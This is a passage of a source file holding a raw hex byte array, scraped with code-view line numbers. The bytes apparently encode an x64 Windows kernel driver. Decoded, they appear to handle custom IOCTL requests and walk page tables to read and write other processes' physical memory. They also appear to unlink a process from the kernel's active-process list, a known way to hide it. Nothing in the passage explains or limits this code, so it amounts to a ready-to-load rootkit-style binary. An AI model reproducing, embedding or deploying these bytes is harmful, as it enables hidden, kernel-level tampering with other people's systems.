0xDA, 0x33, 0xD2, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 97 | 0xCC, 0x0F, 0x00, 0x00, 0x8B, 0x43, 0x30, 0x48, 0x83, 0xC4, 0x20, 0x5B, 98 | 0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x55, 0x48, 0x8B, 99 | 0xEC, 0x48, 0x83, 0xEC, 0x60, 0x48, 0x8B, 0xD9, 0x48, 0x8D, 0x15, 0x39, 100 | 0x0D, 0x00, 0x00, 0x0F, 0x57, 0xC0, 0x48, 0x8D, 0x4D, 0xE0, 0x0F, 0x11, 101 | 0x45, 0xE0, 0xFF, 0x15, 0x78, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x45, 0x20, 102 | 0x48, 0xC7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 103 | 0x30, 0x4C, 0x8D, 0x45, 0xE0, 0xC6, 0x44, 0x24, 0x28, 0x00, 0x41, 0xB9, 104 | 0x22, 0x00, 0x00, 0x00, 0x33, 0xD2, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x01, 105 | 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x6D, 0x0F, 0x00, 0x00, 0x85, 106 | 0xC0, 0x79, 0x05, 0x0F, 0xAE, 0xE8, 0xEB, 0x6D, 0x0F, 0x57, 0xC0, 0x48, 107 | 0x8D, 0x15, 0x12, 0x0D, 0x00, 0x00, 0x48, 0x8D, 0x4D, 0xF0, 0x0F, 0x11, 108 | 0x45, 0xF0, 0xFF, 0x15, 0x24, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x55, 0xE0, 109 | 0x48, 0x8D, 0x4D, 0xF0, 0xFF, 0x15, 0x46, 0x0F, 0x00, 0x00, 0x85, 0xC0, 110 | 0x78, 0xD1, 0x48, 0x8B, 0x45, 0x20, 0x83, 0x48, 0x30, 0x04, 0x48, 0x8D, 111 | 0x05, 0x43, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x43, 0x70, 0x48, 0x89, 0x83, 112 | 0x80, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x05, 0xD1, 0x02, 0x00, 0x00, 0x48, 113 | 0x89, 0x83, 0xE0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x45, 0x20, 0x48, 0xC7, 114 | 0x43, 0x68, 0x00, 0x00, 0x00, 0x00, 0x83, 0x60, 0x30, 0xEF, 0x48, 0x8B, 115 | 0x45, 0x20, 0x0F, 0xBA, 0x70, 0x30, 0x07, 0x33, 0xC0, 0x48, 0x8B, 0x5C, 116 | 0x24, 0x70, 0x48, 0x83, 0xC4, 0x60, 0x5D, 0xC3, 0x48, 0x83, 0xEC, 0x28, 117 | 0x48, 0xB8, 0xC3, 0x4B, 0x9E, 0x4C, 0x09, 0x00, 0x00, 0x00, 0x48, 0x39, 118 | 0x01, 0x74, 0x07, 0xB8, 0x01, 0x00, 0x00, 0xC0, 0xEB, 0x29, 0x45, 0x33, 119 | 0xC0, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x4C, 120 | 0x24, 0x30, 0x48, 0x8D, 0x54, 0x24, 0x30, 0x41, 0x8D, 0x48, 0x42, 0xE8, 121 | 0x46, 0x06, 0x00, 0x00, 0x85, 0xC0, 0x79, 0x05, 0x0F, 0xAE, 0xE8, 0xEB, 122 
| 0x02, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x28, 0xC3, 0x40, 0x53, 0x48, 0x83, 123 | 0xEC, 0x20, 0x48, 0x8B, 0x41, 0x28, 0x48, 0x8B, 0xD9, 0x48, 0x85, 0xC0, 124 | 0x75, 0x0D, 0xE8, 0x11, 0x00, 0x00, 0x00, 0x48, 0x0F, 0xBF, 0xC0, 0x48, 125 | 0x8B, 0x04, 0x18, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC, 126 | 0x48, 0x81, 0xEC, 0x48, 0x01, 0x00, 0x00, 0x33, 0xD2, 0x48, 0x8D, 0x4C, 127 | 0x24, 0x20, 0x41, 0xB8, 0x14, 0x01, 0x00, 0x00, 0xE8, 0xFB, 0x09, 0x00, 128 | 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xFF, 0x15, 0x38, 0x0E, 0x00, 0x00, 129 | 0x8B, 0x44, 0x24, 0x2C, 0x2D, 0xEE, 0x42, 0x00, 0x00, 0x74, 0x2B, 0x2D, 130 | 0x75, 0x02, 0x00, 0x00, 0x74, 0x24, 0x2D, 0x57, 0x02, 0x00, 0x00, 0x74, 131 | 0x16, 0x83, 0xE8, 0x01, 0x74, 0x11, 0x2D, 0xA6, 0x02, 0x00, 0x00, 0x74, 132 | 0x03, 0x83, 0xE8, 0x04, 0xB8, 0x88, 0x03, 0x00, 0x00, 0xEB, 0x0C, 0xB8, 133 | 0x80, 0x02, 0x00, 0x00, 0xEB, 0x05, 0xB8, 0x78, 0x02, 0x00, 0x00, 0x48, 134 | 0x81, 0xC4, 0x48, 0x01, 0x00, 0x00, 0xC3, 0xCC, 0x40, 0x53, 0x48, 0x83, 135 | 0xEC, 0x20, 0x48, 0xB8, 0xC3, 0x4B, 0x9E, 0x4C, 0x09, 0x00, 0x00, 0x00, 136 | 0x48, 0x8B, 0xD9, 0x48, 0x39, 0x01, 0x75, 0x4D, 0x48, 0x63, 0x41, 0x08, 137 | 0x85, 0xC0, 0x74, 0x45, 0x48, 0x8B, 0xC8, 0x48, 0xC7, 0x44, 0x24, 0x30, 138 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x30, 0xFF, 0x15, 0x05, 139 | 0x0E, 0x00, 0x00, 0x85, 0xC0, 0x79, 0x05, 0x0F, 0xAE, 0xE8, 0xEB, 0x2A, 140 | 0x48, 0x8B, 0x4C, 0x24, 0x30, 0xE8, 0x56, 0x05, 0x00, 0x00, 0x48, 0x85, 141 | 0xC0, 0x74, 0x16, 0x48, 0x8B, 0x4B, 0x10, 0x48, 0x89, 0x01, 0x48, 0x8B, 142 | 0x4C, 0x24, 0x30, 0xFF, 0x15, 0xCB, 0x0D, 0x00, 0x00, 0x33, 0xC0, 0xEB, 143 | 0x05, 0xB8, 0x01, 0x00, 0x00, 0xC0, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 144 | 0x48, 0x83, 0xEC, 0x28, 0x48, 0xB8, 0xC3, 0x4B, 0x9E, 0x4C, 0x09, 0x00, 145 | 0x00, 0x00, 0x48, 0x39, 0x01, 0x75, 0x54, 0x48, 0x63, 0x41, 0x08, 0x85, 146 | 0xC0, 0x74, 0x4C, 0x48, 0x8B, 0xC8, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 147 | 0x00, 0x00, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x30, 
0xFF, 0x15, 0x9A, 0x0D, 148 | 0x00, 0x00, 0x85, 0xC0, 0x79, 0x05, 0x0F, 0xAE, 0xE8, 0xEB, 0x31, 0x48, 149 | 0x8B, 0x54, 0x24, 0x30, 0x48, 0x8B, 0x8A, 0x50, 0x04, 0x00, 0x00, 0x48, 150 | 0x8B, 0x82, 0x48, 0x04, 0x00, 0x00, 0x48, 0x89, 0x01, 0x48, 0x8B, 0x82, 151 | 0x50, 0x04, 0x00, 0x00, 0x48, 0x8B, 0x8A, 0x48, 0x04, 0x00, 0x00, 0x48, 152 | 0x89, 0x41, 0x08, 0x33, 0xC0, 0xEB, 0x05, 0xB8, 0x01, 0x00, 0x00, 0xC0, 153 | 0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0xCC, 0xCC, 0x4C, 0x8B, 0xDC, 0x49, 154 | 0x89, 0x5B, 0x10, 0x49, 0x89, 0x73, 0x18, 0x57, 0x48, 0x83, 0xEC, 0x30, 155 | 0x48, 0xB8, 0xC3, 0x4B, 0x9E, 0x4C, 0x09, 0x00, 0x00, 0x00, 0x48, 0x8B, 156 | 0xF9, 0x48, 0x39, 0x01, 0x0F, 0x85, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x41, 157 | 0x08, 0x85, 0xC0, 0x0F, 0x84, 0x9A, 0x00, 0x00, 0x00, 0x8B, 0xC8, 0x49, 158 | 0xC7, 0x43, 0x08, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8D, 0x53, 0x08, 0xFF, 159 | 0x15, 0x13, 0x0D, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x40, 0x48, 0x85, 160 | 0xC9, 0x74, 0x7C, 0xE8, 0x38, 0xFE, 0xFF, 0xFF, 0x48, 0x8B, 0x4C, 0x24, 161 | 0x40, 0x48, 0x8B, 0xD8, 0xFF, 0x15, 0xE6, 0x0C, 0x00, 0x00, 0x48, 0x8B, 162 | 0x57, 0x10, 0x48, 0x8B, 0xCB, 0x48, 0x8B, 0x77, 0x20, 0xE8, 0x3E, 0x02, 163 | 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x54, 0x4C, 0x8B, 0x57, 0x18, 0x48, 164 | 0x8B, 0xC8, 0x81, 0xE1, 0xFF, 0x0F, 0x00, 0x00, 0xBA, 0x00, 0x10, 0x00, 165 | 0x00, 0x48, 0x2B, 0xD1, 0x48, 0x8D, 0x4F, 0x28, 0x48, 0x3B, 0xD6, 0x48, 166 | 0x0F, 0x42, 0xF2, 0x80, 0x7F, 0x30, 0x00, 0x4C, 0x8B, 0xC6, 0x74, 0x10, 167 | 0x4C, 0x8B, 0xC9, 0x49, 0x8B, 0xD2, 0x48, 0x8B, 0xC8, 0xE8, 0x9A, 0x03, 168 | 0x00, 0x00, 0xEB, 0x17, 0x48, 0x89, 0x4C, 0x24, 0x20, 0x41, 0xB9, 0x01, 169 | 0x00, 0x00, 0x00, 0x49, 0x8B, 0xCA, 0x48, 0x8B, 0xD0, 0xFF, 0x15, 0x89, 170 | 0x0C, 0x00, 0x00, 0x33, 0xC0, 0xEB, 0x05, 0xB8, 0x01, 0x00, 0x00, 0xC0, 171 | 0x48, 0x8B, 0x5C, 0x24, 0x48, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48, 0x83, 172 | 0xC4, 0x30, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 173 | 0x48, 0x89, 0x5C, 
0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 174 | 0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x40, 175 | 0x48, 0x8B, 0x82, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xFA, 0xBB, 0x01, 176 | 0x00, 0x00, 0xC0, 0x8B, 0x50, 0x18, 0x8B, 0x48, 0x10, 0x81, 0xFA, 0xCC, 177 | 0xB0, 0x2B, 0x00, 0x75, 0x25, 0x41, 0xBE, 0x38, 0x00, 0x00, 0x00, 0x41, 178 | 0x3B, 0xCE, 0x75, 0x10, 0x49, 0x8B, 0x4F, 0x18, 0xE8, 0xCF, 0xFE, 0xFF, 179 | 0xFF, 0x8B, 0xD8, 0xE9, 0x4A, 0x01, 0x00, 0x00, 0xBB, 0x04, 0x00, 0x00, 180 | 0xC0, 0xE9, 0x3D, 0x01, 0x00, 0x00, 0x81, 0xFA, 0xD0, 0xB0, 0x2B, 0x00, 181 | 0x75, 0x22, 0x41, 0xBE, 0x38, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x75, 182 | 0xE3, 0x49, 0x8B, 0x4F, 0x18, 0x48, 0x8D, 0x15, 0xF8, 0x1B, 0x00, 0x00, 183 | 0x48, 0x8B, 0x49, 0x08, 0xFF, 0x15, 0xEE, 0x0B, 0x00, 0x00, 0xEB, 0xC5, 184 | 0x81, 0xFA, 0xD4, 0xB0, 0x2B, 0x00, 0x0F, 0x85, 0x93, 0x00, 0x00, 0x00, 185 | 0x41, 0xBE, 0x38, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x75, 0xB5, 0x49, 186 | 0x8B, 0x47, 0x18, 0x80, 0x78, 0x30, 0x00, 0x74, 0x30, 0x48, 0x83, 0x3D, 187 | 0xC3, 0x1B, 0x00, 0x00, 0x00, 0x0F, 0x84, 0xE7, 0x00, 0x00, 0x00, 0x48, 188 | 0x8B, 0x78, 0x20, 0x48, 0x8D, 0x58, 0x28, 0x48, 0x8B, 0x70, 0x10, 0x48, 189 | 0x8B, 0x68, 0x18, 0xFF, 0x15, 0x8F, 0x0B, 0x00, 0x00, 0x4C, 0x8B, 0x05, 190 | 0xA0, 0x1B, 0x00, 0x00, 0x48, 0x8B, 0xC8, 0xEB, 0x2E, 0x48, 0x83, 0x3D, 191 | 0x93, 0x1B, 0x00, 0x00, 0x00, 0x0F, 0x84, 0xB7, 0x00, 0x00, 0x00, 0x48, 192 | 0x8B, 0x78, 0x20, 0x48, 0x8D, 0x58, 0x28, 0x48, 0x8B, 0x70, 0x18, 0x48, 193 | 0x8B, 0x68, 0x10, 0xFF, 0x15, 0x5F, 0x0B, 0x00, 0x00, 0x48, 0x8B, 0x0D, 194 | 0x70, 0x1B, 0x00, 0x00, 0x4C, 0x8B, 0xC0, 0x48, 0x89, 0x5C, 0x24, 0x30, 195 | 0x4C, 0x8B, 0xCE, 0xC6, 0x44, 0x24, 0x28, 0x00, 0x48, 0x8B, 0xD5, 0x48, 196 | 0x89, 0x7C, 0x24, 0x20, 0xFF, 0x15, 0x62, 0x0B, 0x00, 0x00, 0xE9, 0x26, 197 | 0xFF, 0xFF, 0xFF, 0x81, 0xFA, 0xD8, 0xB0, 0x2B, 0x00, 0x75, 0x1D, 0x41, 198 | 0xBE, 0x18, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x0F, 0x85, 0x16, 
0xFF, 199 | 0xFF, 0xFF, 0x49, 0x8B, 0x4F, 0x18, 0xE8, 0xF1, 0xFC, 0xFF, 0xFF, 0xE9, 200 | 0x01, 0xFF, 0xFF, 0xFF, 0x81, 0xFA, 0xDC, 0xB0, 0x2B, 0x00, 0x75, 0x1D, 201 | 0x41, 0xBE, 0x10, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x0F, 0x85, 0xF1, 202 | 0xFE, 0xFF, 0xFF, 0x49, 0x8B, 0x4F, 0x18, 0xE8, 0xF4, 0xFB, 0xFF, 0xFF, 203 | 0xE9, 0xDC, 0xFE, 0xFF, 0xFF, 0x81, 0xFA, 0xE0, 0xB0, 0x2B, 0x00, 0x75, 204 | 0x1D, 0x41, 0xBE, 0x10, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x0F, 0x85, 205 | 0xCC, 0xFE, 0xFF, 0xFF, 0x49, 0x8B, 0x4F, 0x18, 0xE8, 0x17, 0xFD, 0xFF, 206 | 0xFF, 0xE9, 0xB7, 0xFE, 0xFF, 0xFF, 0xBB, 0x10, 0x00, 0x00, 0xC0, 0x45, 207 | 0x33, 0xF6, 0x33, 0xD2, 0x41, 0x89, 0x5F, 0x30, 0x49, 0x8B, 0xCF, 0x4D, 208 | 0x89, 0x77, 0x38, 0xFF, 0x15, 0x93, 0x0A, 0x00, 0x00, 0x48, 0x8B, 0x6C, 209 | 0x24, 0x68, 0x8B, 0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x60, 0x48, 0x8B, 0x74, 210 | 0x24, 0x70, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5F, 0x41, 0x5E, 0x5F, 0xC3, 211 | 0x48, 0x89, 0x54, 0x24, 0x10, 0x55, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 212 | 0x56, 0x41, 0x57, 0x48, 0x8B, 0xEC, 0x48, 0x83, 0xEC, 0x40, 0x4C, 0x8B, 213 | 0xF2, 0x48, 0xC7, 0x45, 0x40, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xF2, 214 | 0x48, 0xC7, 0x45, 0x50, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xFA, 0x48, 215 | 0xC1, 0xEE, 0x0C, 0x48, 0x8B, 0xDA, 0x48, 0xC1, 0xEF, 0x15, 0xB8, 0xFF, 216 | 0x01, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x27, 0x48, 0x23, 0xD0, 0x48, 0xC1, 217 | 0xEB, 0x1E, 0x48, 0x83, 0xE1, 0xF0, 0x41, 0xBC, 0x01, 0x00, 0x00, 0x00, 218 | 0x48, 0x23, 0xF0, 0x48, 0x23, 0xF8, 0x48, 0x23, 0xD8, 0x45, 0x8B, 0xCC, 219 | 0x48, 0x8D, 0x45, 0x40, 0x41, 0x81, 0xE6, 0xFF, 0x0F, 0x00, 0x00, 0x48, 220 | 0x8D, 0x14, 0xD1, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8D, 0x4D, 0x50, 221 | 0x45, 0x8D, 0x44, 0x24, 0x07, 0xFF, 0x15, 0x1D, 0x0A, 0x00, 0x00, 0x48, 222 | 0x8B, 0x4D, 0x50, 0x8A, 0xC1, 0xF6, 0xD0, 0x41, 0x84, 0xC4, 0x0F, 0x85, 223 | 0xF1, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x45, 0x40, 0x48, 0xC7, 0x45, 0x58, 224 | 0x00, 0x00, 0x00, 0x00, 0x49, 0xBF, 
0x00, 0xF0, 0xFF, 0xFF, 0x0F, 0x00, 225 | 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x49, 0x23, 0xCF, 0x45, 0x8B, 226 | 0xCC, 0x48, 0x8D, 0x14, 0xD9, 0x41, 0x8D, 0x5C, 0x24, 0x07, 0x44, 0x8B, 227 | 0xC3, 0x48, 0x8D, 0x4D, 0x58, 0xFF, 0x15, 0xD5, 0x09, 0x00, 0x00, 0x48, 228 | 0x8B, 0x55, 0x58, 0x8A, 0xC2, 0xF6, 0xD0, 0x41, 0x84, 0xC4, 0x0F, 0x85, 229 | 0xA9, 0x00, 0x00, 0x00, 0x84, 0xD2, 0x79, 0x1F, 0x48, 0x8B, 0x4D, 0x48, 230 | 0x48, 0xB8, 0x00, 0x00, 0x00, 0xC0, 0xFF, 0xFF, 0x0F, 0x00, 0x48, 0x23, 231 | 0xC2, 0x81, 0xE1, 0xFF, 0xFF, 0xFF, 0x3F, 0x48, 0x03, 0xC1, 0xE9, 0x88, 232 | 0x00, 0x00, 0x00, 0x49, 0x23, 0xD7, 0x48, 0xC7, 0x45, 0xF0, 0x00, 0x00, 233 | 0x00, 0x00, 0x48, 0x8D, 0x45, 0x40, 0x45, 0x8B, 0xCC, 0x4C, 0x8B, 0xC3, 234 | 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8D, 0x4D, 0xF0, 0x48, 0x8D, 0x14, 235 | 0xFA, 0xFF, 0x15, 0x79, 0x09, 0x00, 0x00, 0x48, 0x8B, 0x45, 0xF0, 0x8A, 236 | 0xC8, 0xF6, 0xD1, 0x41, 0x84, 0xCC, 0x75, 0x51, 0x84, 0xC0, 0x79, 0x0F, 237 | 0x48, 0x8B, 0x4D, 0x48, 0x49, 0x23, 0xC7, 0x81, 0xE1, 0xFF, 0xFF, 0x1F, 238 | 0x00, 0xEB, 0xB0, 0x49, 0x23, 0xC7, 0x48, 0xC7, 0x45, 0x48, 0x00, 0x00, 239 | 0x00, 0x00, 0x45, 0x8B, 0xCC, 0x48, 0x8D, 0x4D, 0x48, 0x4C, 0x8B, 0xC3, 240 | 0x48, 0x8D, 0x14, 0xF0, 0x48, 0x8D, 0x45, 0x40, 0x48, 0x89, 0x44, 0x24, 241 | 0x20, 0xFF, 0x15, 0x31, 0x09, 0x00, 0x00, 0x48, 0x8B, 0x45, 0x48, 0x49, 242 | 0x23, 0xC7, 0x4A, 0x8D, 0x0C, 0x30, 0x48, 0xF7, 0xD8, 0x48, 0x1B, 0xC0, 243 | 0x48, 0x23, 0xC1, 0xEB, 0x02, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x40, 0x41, 244 | 0x5F, 0x41, 0x5E, 0x41, 0x5C, 0x5F, 0x5E, 0x5B, 0x5D, 0xC3, 0xCC, 0xCC, 245 | 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 246 | 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x49, 0x8B, 0xF1, 0x49, 247 | 0x8B, 0xD8, 0x48, 0x8B, 0xEA, 0x48, 0x85, 0xC9, 0x74, 0x38, 0x41, 0xB8, 248 | 0x04, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xD3, 0xFF, 0x15, 0xA7, 0x08, 0x00, 249 | 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x85, 0xC0, 0x74, 0x21, 0x4C, 0x8B, 0xC3, 250 | 0x48, 
0x8B, 0xD5, 0x48, 0x8B, 0xC8, 0xE8, 0x79, 0x01, 0x00, 0x00, 0x48, 251 | 0x8B, 0xD3, 0x48, 0x89, 0x1E, 0x48, 0x8B, 0xCF, 0xFF, 0x15, 0x7A, 0x08, 252 | 0x00, 0x00, 0x33, 0xC0, 0xEB, 0x05, 0xB8, 0x01, 0x00, 0x00, 0xC0, 0x48, 253 | 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x6C, 0x24, 0x38, 0x48, 0x8B, 0x74, 254 | 0x24, 0x40, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xFF, 0x25, 0xAE, 0x08, 255 | 0x00, 0x00, 0xFF, 0x25, 0xB0, 0x08, 0x00, 0x00, 0x40, 0x53, 0x48, 0x83, 256 | 0xEC, 0x10, 0x33, 0xC0, 0x33, 0xC9, 0x0F, 0xA2, 0x44, 0x8B, 0xC8, 0x33, 257 | 0xC9, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x45, 0x32, 0xC0, 0x0F, 0xA2, 0x89, 258 | 0x04, 0x24, 0x89, 0x5C, 0x24, 0x04, 0x89, 0x4C, 0x24, 0x08, 0x89, 0x54, 259 | 0x24, 0x0C, 0x0F, 0xBA, 0xE1, 0x14, 0x73, 0x2E, 0xB3, 0x08, 0x44, 0x8A, 260 | 0xC3, 0x0F, 0xBA, 0xE1, 0x1B, 0x73, 0x23, 0x0F, 0xBA, 0xE1, 0x1C, 0x73, 261 | 0x1D, 0x33, 0xC9, 0x0F, 0x01, 0xD0, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 262 | 0xD0, 0x44, 0x0F, 0xB6, 0xC3, 0x80, 0xE2, 0x06, 0x8D, 0x41, 0x0C, 0x80, 263 | 0xFA, 0x06, 0x44, 0x0F, 0x44, 0xC0, 0xB8, 0x07, 0x00, 0x00, 0x00, 0x44, 264 | 0x3B, 0xC8, 0x7C, 0x39, 0x33, 0xC9, 0x0F, 0xA2, 0x89, 0x04, 0x24, 0x41, 265 | 0x8A, 0xC0, 0x0C, 0x02, 0x89, 0x54, 0x24, 0x0C, 0x0F, 0xB6, 0xD0, 0x0F, 266 | 0xBA, 0xE3, 0x09, 0x41, 0x0F, 0xB6, 0xC0, 0x0F, 0x43, 0xD0, 0x89, 0x5C, 267 | 0x24, 0x04, 0x89, 0x4C, 0x24, 0x08, 0x44, 0x8A, 0xC2, 0xF6, 0xC3, 0x20, 268 | 0x74, 0x0B, 0xF6, 0xC2, 0x04, 0x74, 0x06, 0x80, 0xCA, 0x10, 0x44, 0x8A, 269 | 0xC2, 0x41, 0x80, 0xC8, 0x01, 0x44, 0x88, 0x05, 0x94, 0x17, 0x00, 0x00, 270 | 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x10, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 271 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xC2, 0x00, 0x00, 0xCC, 272 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 273 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 274 | 0x00, 0x00, 0x00, 0x00, 0xFF, 0xE0, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 275 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 
0xCC, 0xCC, 0xCC, 276 | 0xCC, 0xCC, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 277 | 0xFF, 0x25, 0xC2, 0x07, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 278 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 279 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 280 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 281 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 282 | 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x8B, 0xC1, 0x49, 0x83, 0xF8, 0x08, 0x72, 283 | 0x37, 0x49, 0x83, 0xF8, 0x10, 0x77, 0x11, 0x4C, 0x8B, 0x1A, 0x4A, 0x8B, 284 | 0x54, 0x02, 0xF8, 0x4C, 0x89, 0x19, 0x4A, 0x89, 0x54, 0x01, 0xF8, 0xC3, 285 | 0x49, 0x83, 0xF8, 0x20, 0x77, 0x5A, 0x0F, 0x10, 0x02, 0x42, 0x0F, 0x10, 286 | 0x4C, 0x02, 0xF0, 0x0F, 0x11, 0x01, 0x42, 0x0F, 0x11, 0x4C, 0x01, 0xF0, 287 | 0xC3, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x85, 0xC0, 0x74, 288 | 0x15, 0x48, 0x2B, 0xD1, 0x72, 0x16, 0x44, 0x8A, 0x1C, 0x11, 0x48, 0xFF, 289 | 0xC1, 0x49, 0xFF, 0xC8, 0x44, 0x88, 0x59, 0xFF, 0x75, 0xF0, 0xC3, 0x0F, 290 | 0x1F, 0x44, 0x00, 0x00, 0x49, 0x03, 0xC8, 0x44, 0x8A, 0x5C, 0x11, 0xFF, 291 | 0x48, 0xFF, 0xC9, 0x49, 0xFF, 0xC8, 0x44, 0x88, 0x19, 0x75, 0xF0, 0xC3, 292 | 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 293 | 0x4E, 0x8D, 0x1C, 0x02, 0x48, 0x2B, 0xD1, 0x73, 0x09, 0x4C, 0x3B, 0xD9, 294 | 0x0F, 0x87, 0x6E, 0x01, 0x00, 0x00, 0x0F, 0x10, 0x04, 0x11, 0x48, 0x83, 295 | 0xC1, 0x10, 0xF6, 0xC1, 0x0F, 0x74, 0x12, 0x48, 0x83, 0xE1, 0xF0, 0x0F, 296 | 0x10, 0x0C, 0x11, 0x0F, 0x11, 0x00, 0x0F, 0x28, 0xC1, 0x48, 0x83, 0xC1, 297 | 0x10, 0x4C, 0x03, 0xC0, 0x4C, 0x2B, 0xC1, 0x4D, 0x8B, 0xC8, 0x49, 0xC1, 298 | 0xE9, 0x06, 0x74, 0x6F, 0x49, 0x81, 0xF9, 0x00, 0x10, 0x00, 0x00, 0x0F, 299 | 0x87, 0xB3, 0x00, 0x00, 0x00, 0x49, 0x83, 0xE0, 0x3F, 0xEB, 0x2D, 0x66, 300 | 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 301 | 0x00, 0x00, 0x66, 0x66, 
0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 302 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 303 | 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x10, 0x0C, 0x11, 304 | 0x0F, 0x10, 0x54, 0x11, 0x10, 0x0F, 0x10, 0x5C, 0x11, 0x20, 0x0F, 0x10, 305 | 0x64, 0x11, 0x30, 0x0F, 0x29, 0x41, 0xF0, 0x48, 0x83, 0xC1, 0x40, 0x49, 306 | 0xFF, 0xC9, 0x0F, 0x29, 0x49, 0xC0, 0x0F, 0x29, 0x51, 0xD0, 0x0F, 0x29, 307 | 0x59, 0xE0, 0x0F, 0x28, 0xC4, 0x75, 0xD1, 0x4D, 0x8B, 0xC8, 0x49, 0xC1, 308 | 0xE9, 0x04, 0x74, 0x19, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 309 | 0x0F, 0x29, 0x41, 0xF0, 0x0F, 0x10, 0x04, 0x11, 0x48, 0x83, 0xC1, 0x10, 310 | 0x49, 0xFF, 0xC9, 0x75, 0xEF, 0x49, 0x83, 0xE0, 0x0F, 0x74, 0x0E, 0x4E, 311 | 0x8D, 0x5C, 0x01, 0xF0, 0x41, 0x0F, 0x10, 0x0C, 0x13, 0x41, 0x0F, 0x11, 312 | 0x0B, 0x0F, 0x29, 0x41, 0xF0, 0xC3, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 313 | 